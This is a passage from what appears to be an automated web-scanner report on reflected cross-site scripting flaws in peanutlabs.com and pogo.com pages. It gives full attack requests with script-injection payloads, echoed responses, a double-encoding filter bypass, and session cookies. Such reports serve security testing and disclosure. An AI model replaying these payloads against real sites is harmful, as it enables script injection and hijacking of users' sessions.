Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:36:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pl_email=test4%40fastdial.net; expires=Tue, 08-Feb-2011 02:36:07 GMT; path=/; domain=.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 25211

{"uid":"12633542","user_id":"998826224-3432-8939b981e2","network_uid":"998826224-1-3432.sa","created":"2011-01-08 20:33:15","verified":"0","id":"12633542","name":"Pogo Subs","email":"test4@fastdial.net","sex":"2","org_user_id":"998826224-3432-8939b981e2","advertiser_id":"0","dob":"1970-01-01","cc":"US","mid":null,"mid_update":null,"logging":"1","user_uid":"12633542","rewardAvailable":"c00a4<img src=a onerror=alert(1)>d0ead2e6fff","default_page":1,"cl_enabled":"0","has_survey":2,"has_offer":4,"has_payment":0,"has_deals":0,"currency_conversion":"0.50","landing_page_f":"","limit_info":{"survey_limit":0,"offer_limit":"5"},"show_u
...[SNIP]...

3.597. http://www.peanutlabs.com/js/iFrame/sc.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/js/iFrame/sc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97586'%3balert(1)//07d2d3ed2aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97586';alert(1)//07d2d3ed2aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/iFrame/sc.php?userId=998826224-3432-8939b9/97586'%3balert(1)//07d2d3ed2aa81e2 HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:33:30 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 571

<html>

   <head>
       <script type="text/javascript" src="http://static.peanutlabs.com/js/pl-jquery-1.3.2.min.js"></script>
       <script type="text/javascript" src="http://static.peanutlabs.com/js/core.js"><
...[SNIP]...
<script type="text/javascript">
           userId = '998826224-3432-8939b9/97586';alert(1)//07d2d3ed2aa81e2';
       </script>
...[SNIP]...

3.598. http://www.peanutlabs.com/js/iFrame/sc.php [userId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/js/iFrame/sc.php

Issue detail

The value of the userId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff40d'%3balert(1)//866b553c32d was submitted in the userId parameter. This input was echoed as ff40d';alert(1)//866b553c32d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/iFrame/sc.php?userId=998826224-3432-8939b981e2ff40d'%3balert(1)//866b553c32d HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:32:51 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 570

<html>

   <head>
       <script type="text/javascript" src="http://static.peanutlabs.com/js/pl-jquery-1.3.2.min.js"></script>
       <script type="text/javascript" src="http://static.peanutlabs.com/js/core.js"><
...[SNIP]...
<script type="text/javascript">
           userId = '998826224-3432-8939b981e2ff40d';alert(1)//866b553c32d';
       </script>
...[SNIP]...

3.599. http://www.peanutlabs.com/sampleIframe.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/sampleIframe.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5765"><script>alert(1)</script>55e45c8f29a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sampleIframe.php?userId=testaccount@peanutlabs.com2962-69-abdd5b/f5765"><script>alert(1)</script>55e45c8f29a1634 HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:08:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 568
Connection: close
Content-Type: text/html

<head><title>Sample iFrame</title></head>
<body bgcolor="#e7e7e7">

<div align="center">

<iframe align="middle" frameborder=0 scrolling="no" style="width:653px; height:1230px;"
src="/pl/userGreeting.php?profileData=&hash=&allow=&surveyId= &userId=testaccount@peanutlabs.com2962-69-abdd5b/f5765"><script>alert(1)</script>55e45c8f29a1634&procPoint=&transactionId=&status= &mode=&t=&dob=&sex=&profiler_title= &profiler_description=&profiler_button= &no_surveys_msg=&lang= &endUserId=&appId=&t=&rewardAvailable=&exchange=&currencyNa
...[SNIP]...

3.600. http://www.peanutlabs.com/sampleIframe.php [userId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/sampleIframe.php

Issue detail

The value of the userId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f75d4"><script>alert(1)</script>8d6cc451af9 was submitted in the userId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sampleIframe.php?userId=f75d4"><script>alert(1)</script>8d6cc451af9 HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:08:18 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 523
Connection: close
Content-Type: text/html

<head><title>Sample iFrame</title></head>
<body bgcolor="#e7e7e7">

<div align="center">

<iframe align="middle" frameborder=0 scrolling="no" style="width:653px; height:1230px;"
src="/pl/userGreeting.php?profileData=&hash=&allow=&surveyId= &userId=f75d4"><script>alert(1)</script>8d6cc451af9&procPoint=&transactionId=&status= &mode=&t=&dob=&sex=&profiler_title= &profiler_description=&profiler_button= &no_surveys_msg=&lang= &endUserId=&appId=&t=&rewardAvailable=&exchange=&currencyName="
...[SNIP]...

3.601. http://www.pogo.com/ [f9258%22%3E%3Cscript%3Ealert(document.cookie parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The value of the f9258%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7809"><script>alert(1)</script>9c836ad6bee was submitted in the f9258%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookied7809"><script>alert(1)</script>9c836ad6bee HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

3.602. http://www.pogo.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 575b9"><script>alert(1)</script>25a93ddaf89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie&575b9"><script>alert(1)</script>25a93ddaf89=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

3.603. http://www.pogo.com/account/my-account/recover.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/account/my-account/recover.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcb5"><a>43948eebdae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/my-account/recover.do?5fcb5"><a>43948eebdae=1 HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/account/verify-password.do
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536425818-New%7C1297128425818%3B

Response (redirected)

3.604. http://www.pogo.com/action/pogo/createAccount.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/createAccount.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 152d8</script><script>alert(1)</script>35e94ca2073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /action/pogo/createAccount.do?pageSection=header_reg&152d8</script><script>alert(1)</script>35e94ca2073=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:01:19 GMT
Server: Apache-Coyote/1.1
Content-Length: 43927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/action/pogo/createAccount.do?pageSection=header_reg&152d8</script><script>alert(1)</script>35e94ca2073=1";
s.eVar2="pogo";
s.pageName="Pogo Create Account Page";
s.prop2="pogo";
s.channel="registration";
s.eVar18="un_header_reg";
s.prop7="POGO:registration:::Pogo Create Account Page:Non Authenticated";
...[SNIP]...

3.605. http://www.pogo.com/action/pogo/createAccount.do [pageSection parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/createAccount.do

Issue detail

The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c15b</script><script>alert(1)</script>11b14ca1e6d was submitted in the pageSection parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /action/pogo/createAccount.do?pageSection=header_reg1c15b</script><script>alert(1)</script>11b14ca1e6d HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:00:48 GMT
Server: Apache-Coyote/1.1
Content-Length: 44067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/action/pogo/createAccount.do?pageSection=header_reg1c15b</script><script>alert(1)</script>11b14ca1e6d";
s.eVar2="pogo";
s.pageName="Pogo Create Account Page";
s.prop2="pogo";
s.channel="registration";
s.eVar18="un_header_reg1c15b%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E11b14ca1e6d";
s.pro
...[SNIP]...

3.606. http://www.pogo.com/card-games [pageSection parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/card-games

Issue detail

The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2874%253c%252fscript%253e37c38751014 was submitted in the pageSection parameter. This input was echoed as c2874</script>37c38751014 in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /card-games?pageSection=categorybar_cardc2874%253c%252fscript%253e37c38751014 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

3.607. http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript%3Ealert(1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/home/home.jsp

Issue detail

The value of the f9258%22%3E%3Cscript%3Ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10188"><script>alert(1)</script>130c5eaf7ce was submitted in the f9258%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /home/home.jsp?f9258%22%3E%3Cscript%3Ealert(110188"><script>alert(1)</script>130c5eaf7ce HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response (redirected)

3.608. http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript%3Ealert(1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/home/home.jsp

Issue detail

The value of the f9258%22%3E%3Cscript%3Ealert(1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971e1</script><script>alert(1)</script>9aa152ea55e was submitted in the f9258%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1971e1</script><script>alert(1)</script>9aa152ea55e HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
